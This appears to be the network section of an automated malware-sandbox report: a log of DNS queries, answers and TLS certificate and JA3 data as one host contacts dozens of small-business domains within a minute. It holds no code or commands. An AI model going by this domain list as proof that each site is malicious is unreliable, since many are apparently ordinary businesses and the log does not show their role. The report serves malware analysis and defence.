                                                                                                                                                          Feb 16, 2021 04:31:35.228455067 CET53521238.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:35.503840923 CET5613053192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:35.598594904 CET53561308.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.788019896 CET5633853192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:36.846999884 CET53563388.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.571891069 CET5942053192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:37.631722927 CET53594208.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.912962914 CET5878453192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:37.973550081 CET53587848.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.981281042 CET6397853192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:38.053709984 CET53639788.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.814162970 CET6293853192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:39.871551037 CET53629388.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:40.935710907 CET5570853192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:41.002589941 CET53557088.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.088893890 CET5680353192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:42.148578882 CET53568038.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.424227953 CET5714553192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:42.484200954 CET53571458.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.814770937 CET5535953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:42.872029066 CET53553598.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.950613976 CET5830653192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:44.019757986 CET53583068.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:44.374440908 CET6412453192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:44.455986977 CET53641248.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:45.580647945 CET4936153192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:45.704838037 CET53493618.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:49.514225006 CET6315053192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:49.573251963 CET53631508.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:52.211272001 CET5327953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:52.417253971 CET53532798.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:52.689636946 CET5688153192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:52.750345945 CET53568818.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:53.508790016 CET5364253192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:53.568752050 CET53536428.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:54.269663095 CET5566753192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:54.328418016 CET53556678.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:57.753783941 CET5483353192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:57.813680887 CET53548338.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:58.297034025 CET6247653192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:58.357018948 CET53624768.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:59.652533054 CET4970553192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:31:59.722109079 CET53497058.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.024365902 CET6147753192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:00.118031025 CET53614778.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.741905928 CET6163353192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:00.800765038 CET53616338.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:01.031503916 CET5594953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:01.094064951 CET53559498.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:01.462515116 CET5760153192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:01.525939941 CET53576018.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:02.434339046 CET4934253192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:02.521812916 CET53493428.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:02.938092947 CET5625353192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:03.004697084 CET53562538.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.442157030 CET4966753192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:05.501130104 CET53496678.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.510523081 CET5543953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:05.570014954 CET53554398.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.902743101 CET5706953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:06.292862892 CET53570698.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.438323021 CET5765953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:07.531253099 CET53576598.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.228743076 CET5471753192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:10.308548927 CET53547178.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.612226009 CET6397553192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:10.688761950 CET53639758.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.038769960 CET5663953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:11.096082926 CET53566398.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.409749985 CET5185653192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:11.473970890 CET53518568.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:14.020593882 CET5654653192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:14.094110966 CET53565468.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:14.853718996 CET6215253192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:14.913343906 CET53621528.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:15.759876013 CET5347053192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:15.821629047 CET53534708.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:16.417448044 CET5644653192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:16.477796078 CET53564468.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:17.119256020 CET5963153192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:17.176754951 CET53596318.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:17.935142994 CET5551553192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:17.995316029 CET53555158.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:18.823540926 CET6454753192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:18.883323908 CET53645478.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:20.173671961 CET5175953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:20.230813026 CET53517598.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:21.550698042 CET5920753192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:21.608179092 CET53592078.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:22.312539101 CET5426953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:22.371629000 CET53542698.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:32.500360966 CET5485653192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:32.562433004 CET53548568.8.8.8192.168.2.3

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                          Feb 16, 2021 04:31:21.640697956 CET192.168.2.38.8.8.80x7159Standard query (0)asgestion.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:24.974905968 CET192.168.2.38.8.8.80x4547Standard query (0)binder-buerotechnik.atA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:26.445280075 CET192.168.2.38.8.8.80x5680Standard query (0)narcert.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:28.557543993 CET192.168.2.38.8.8.80x63bcStandard query (0)dontpassthepepper.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:30.053442955 CET192.168.2.38.8.8.80x67cStandard query (0)bbsmobler.seA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:30.836918116 CET192.168.2.38.8.8.80x5c19Standard query (0)baylegacy.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:32.055636883 CET192.168.2.38.8.8.80xfa35Standard query (0)trulynolen.co.ukA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:32.418595076 CET192.168.2.38.8.8.80x1bceStandard query (0)www.trulynolen.co.ukA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:33.980079889 CET192.168.2.38.8.8.80xcee4Standard query (0)testcoreprohealthuk.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:35.080341101 CET192.168.2.38.8.8.80x96b6Standard query (0)summitmarketingstrategies.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:35.503840923 CET192.168.2.38.8.8.80xf326Standard query (0)bigbaguettes.euA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:36.788019896 CET192.168.2.38.8.8.80x3240Standard query (0)aarvorg.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:37.571891069 CET192.168.2.38.8.8.80x83a9Standard query (0)wien-mitte.co.atA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:37.912962914 CET192.168.2.38.8.8.80xa5e1Standard query (0)tulsawaterheaterinstallation.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:37.981281042 CET192.168.2.38.8.8.80x9a4Standard query (0)latribuessentielle.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:39.814162970 CET192.168.2.38.8.8.80xffadStandard query (0)maratonaclubedeportugal.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:40.935710907 CET192.168.2.38.8.8.80xada1Standard query (0)www.maratonaclubedeportugal.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:42.088893890 CET192.168.2.38.8.8.80x5c89Standard query (0)n1-headache.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:42.424227953 CET192.168.2.38.8.8.80x8b87Standard query (0)bxdf.infoA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:42.814770937 CET192.168.2.38.8.8.80x9636Standard query (0)withahmed.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:43.950613976 CET192.168.2.38.8.8.80xf92cStandard query (0)transportesycementoshidalgo.esA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:44.374440908 CET192.168.2.38.8.8.80x6cddStandard query (0)digivod.deA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:45.580647945 CET192.168.2.38.8.8.80xf8c1Standard query (0)365questions.orgA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:49.514225006 CET192.168.2.38.8.8.80x59d9Standard query (0)truenyc.coA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:52.211272001 CET192.168.2.38.8.8.80xe7ecStandard query (0)ikads.orgA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:52.689636946 CET192.168.2.38.8.8.80xf475Standard query (0)theduke.deA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:53.508790016 CET192.168.2.38.8.8.80x976Standard query (0)manifestinglab.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:54.269663095 CET192.168.2.38.8.8.80x3a24Standard query (0)stacyloeb.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:57.753783941 CET192.168.2.38.8.8.80x8e17Standard query (0)mediaacademy-iraq.orgA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:58.297034025 CET192.168.2.38.8.8.80x742Standard query (0)gemeentehetkompas.nlA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:59.652533054 CET192.168.2.38.8.8.80xc193Standard query (0)daklesa.deA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:00.024365902 CET192.168.2.38.8.8.80x8ccdStandard query (0)pierrehale.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:00.741905928 CET192.168.2.38.8.8.80x3464Standard query (0)conexa4papers.tradeA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:01.031503916 CET192.168.2.38.8.8.80xf66bStandard query (0)bargningavesta.seA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:01.462515116 CET192.168.2.38.8.8.80x2a86Standard query (0)humancondition.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:02.434339046 CET192.168.2.38.8.8.80x76e9Standard query (0)thewellnessmimi.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:02.938092947 CET192.168.2.38.8.8.80xd61cStandard query (0)huehnerauge-entfernen.deA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:05.442157030 CET192.168.2.38.8.8.80xfcb8Standard query (0)12starhd.onlineA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:05.510523081 CET192.168.2.38.8.8.80xeef7Standard query (0)brandl-blumen.deA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:05.902743101 CET192.168.2.38.8.8.80x23cbStandard query (0)you-bysia.com.auA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:07.438323021 CET192.168.2.38.8.8.80x3bf0Standard query (0)youbysia.com.auA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:10.228743076 CET192.168.2.38.8.8.80x59ecStandard query (0)kmbshipping.co.ukA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:10.612226009 CET192.168.2.38.8.8.80xa54eStandard query (0)www.kmbshipping.co.ukA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:11.038769960 CET192.168.2.38.8.8.80xc5ecStandard query (0)idemblogs.comA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:11.409749985 CET192.168.2.38.8.8.80x15d1Standard query (0)nsec.seA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:32.500360966 CET192.168.2.38.8.8.80xd53bStandard query (0)havecamerawilltravel2017.wordpress.comA (IP address)IN (0x0001)

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                          Feb 16, 2021 04:31:21.703397036 CET8.8.8.8192.168.2.30x7159No error (0)asgestion.com185.2.4.64A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:25.036159039 CET8.8.8.8192.168.2.30x4547No error (0)binder-buerotechnik.at87.230.41.243A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:26.512871981 CET8.8.8.8192.168.2.30x5680No error (0)narcert.com166.62.110.232A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:28.780672073 CET8.8.8.8192.168.2.30x63bcNo error (0)dontpassthepepper.com74.220.215.94A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:30.143604994 CET8.8.8.8192.168.2.30x67cNo error (0)bbsmobler.se91.201.60.54A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:30.894342899 CET8.8.8.8192.168.2.30x5c19No error (0)baylegacy.com66.155.35.240A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:32.128249884 CET8.8.8.8192.168.2.30xfa35No error (0)trulynolen.co.uk77.72.5.145A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:32.490235090 CET8.8.8.8192.168.2.30x1bceNo error (0)www.trulynolen.co.uk77.72.5.145A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:34.146749020 CET8.8.8.8192.168.2.30xcee4No error (0)testcoreprohealthuk.com184.175.106.113A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:35.228455067 CET8.8.8.8192.168.2.30x96b6No error (0)summitmarketingstrategies.com91.195.240.117A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:35.598594904 CET8.8.8.8192.168.2.30xf326No error (0)bigbaguettes.eu89.46.91.28A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:36.846999884 CET8.8.8.8192.168.2.30x3240No error (0)aarvorg.com184.168.131.241A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:37.631722927 CET8.8.8.8192.168.2.30x83a9No error (0)wien-mitte.co.at136.243.147.81A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:37.973550081 CET8.8.8.8192.168.2.30xa5e1Name error (3)tulsawaterheaterinstallation.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:38.053709984 CET8.8.8.8192.168.2.30x9a4No error (0)latribuessentielle.com188.165.53.185A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:39.871551037 CET8.8.8.8192.168.2.30xffadNo error (0)maratonaclubedeportugal.com85.234.145.174A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:41.002589941 CET8.8.8.8192.168.2.30xada1No error (0)www.maratonaclubedeportugal.commaratonaclubedeportugal.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:41.002589941 CET8.8.8.8192.168.2.30xada1No error (0)maratonaclubedeportugal.com85.234.145.174A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:42.148578882 CET8.8.8.8192.168.2.30x5c89No error (0)n1-headache.com79.137.75.185A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:42.484200954 CET8.8.8.8192.168.2.30x8b87No error (0)bxdf.info185.107.227.241A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:42.872029066 CET8.8.8.8192.168.2.30x9636No error (0)withahmed.com104.21.78.13A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:42.872029066 CET8.8.8.8192.168.2.30x9636No error (0)withahmed.com172.67.214.111A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:44.019757986 CET8.8.8.8192.168.2.30xf92cNo error (0)transportesycementoshidalgo.es151.139.128.10A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:44.455986977 CET8.8.8.8192.168.2.30x6cddNo error (0)digivod.de159.69.118.212A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:45.704838037 CET8.8.8.8192.168.2.30xf8c1No error (0)365questions.org185.98.131.150A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:49.573251963 CET8.8.8.8192.168.2.30x59d9No error (0)truenyc.co83.166.155.153A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:52.417253971 CET8.8.8.8192.168.2.30xe7ecNo error (0)ikads.org142.93.110.250A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:52.750345945 CET8.8.8.8192.168.2.30xf475No error (0)theduke.de94.16.115.81A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:53.568752050 CET8.8.8.8192.168.2.30x976No error (0)manifestinglab.com35.221.46.9A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:54.328418016 CET8.8.8.8192.168.2.30x3a24No error (0)stacyloeb.com198.12.145.239A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:57.813680887 CET8.8.8.8192.168.2.30x8e17No error (0)mediaacademy-iraq.org144.76.225.204A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:58.357018948 CET8.8.8.8192.168.2.30x742No error (0)gemeentehetkompas.nl52.29.252.113A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:31:59.722109079 CET8.8.8.8192.168.2.30xc193No error (0)daklesa.de178.250.15.192A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:00.118031025 CET8.8.8.8192.168.2.30x8ccdNo error (0)pierrehale.com155.133.142.13A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:00.800765038 CET8.8.8.8192.168.2.30x3464Name error (3)conexa4papers.tradenonenoneA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:01.094064951 CET8.8.8.8192.168.2.30xf66bNo error (0)bargningavesta.se104.21.9.188A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:01.094064951 CET8.8.8.8192.168.2.30xf66bNo error (0)bargningavesta.se172.67.131.4A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:01.525939941 CET8.8.8.8192.168.2.30x2a86No error (0)humancondition.com104.26.13.9A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:01.525939941 CET8.8.8.8192.168.2.30x2a86No error (0)humancondition.com172.67.68.99A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:01.525939941 CET8.8.8.8192.168.2.30x2a86No error (0)humancondition.com104.26.12.9A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:02.521812916 CET8.8.8.8192.168.2.30x76e9No error (0)thewellnessmimi.com142.93.110.250A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:03.004697084 CET8.8.8.8192.168.2.30xd61cNo error (0)huehnerauge-entfernen.de46.30.215.215A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:05.501130104 CET8.8.8.8192.168.2.30xfcb8Name error (3)12starhd.onlinenonenoneA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:05.570014954 CET8.8.8.8192.168.2.30xeef7No error (0)brandl-blumen.de172.67.222.33A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:05.570014954 CET8.8.8.8192.168.2.30xeef7No error (0)brandl-blumen.de104.21.62.85A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:06.292862892 CET8.8.8.8192.168.2.30x23cbNo error (0)you-bysia.com.au116.90.53.15A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:07.531253099 CET8.8.8.8192.168.2.30x3bf0No error (0)youbysia.com.au116.90.53.15A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:10.308548927 CET8.8.8.8192.168.2.30x59ecNo error (0)kmbshipping.co.uk85.119.82.125A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:10.688761950 CET8.8.8.8192.168.2.30xa54eNo error (0)www.kmbshipping.co.uk85.119.82.125A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:11.096082926 CET8.8.8.8192.168.2.30xc5ecNo error (0)idemblogs.com91.121.58.131A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:11.473970890 CET8.8.8.8192.168.2.30x15d1No error (0)nsec.se13.74.136.93A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:32.562433004 CET8.8.8.8192.168.2.30xd53bNo error (0)havecamerawilltravel2017.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:32.562433004 CET8.8.8.8192.168.2.30xd53bNo error (0)lb.wordpress.com192.0.78.12A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:32.562433004 CET8.8.8.8192.168.2.30xd53bNo error (0)lb.wordpress.com192.0.78.13A (IP address)IN (0x0001)

                                                                                                                                                          HTTPS Packets

                                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                          Feb 16, 2021 04:31:21.860255003 CET185.2.4.64443192.168.2.349741CN=asgestion.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jun 18 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Wed Jun 23 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                          CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                          Feb 16, 2021 04:31:25.132283926 CET87.230.41.243443192.168.2.349742CN=binder-buerotechnik.at CN=ZeroSSL RSA Domain Secure Site CA, O=ZeroSSL, C=ATCN=ZeroSSL RSA Domain Secure Site CA, O=ZeroSSL, C=AT CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USMon Dec 07 01:00:00 CET 2020 Thu Jan 30 01:00:00 CET 2020Mon Mar 08 00:59:59 CET 2021 Wed Jan 30 00:59:59 CET 2030771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=ZeroSSL RSA Domain Secure Site CA, O=ZeroSSL, C=ATCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USThu Jan 30 01:00:00 CET 2020Wed Jan 30 00:59:59 CET 2030
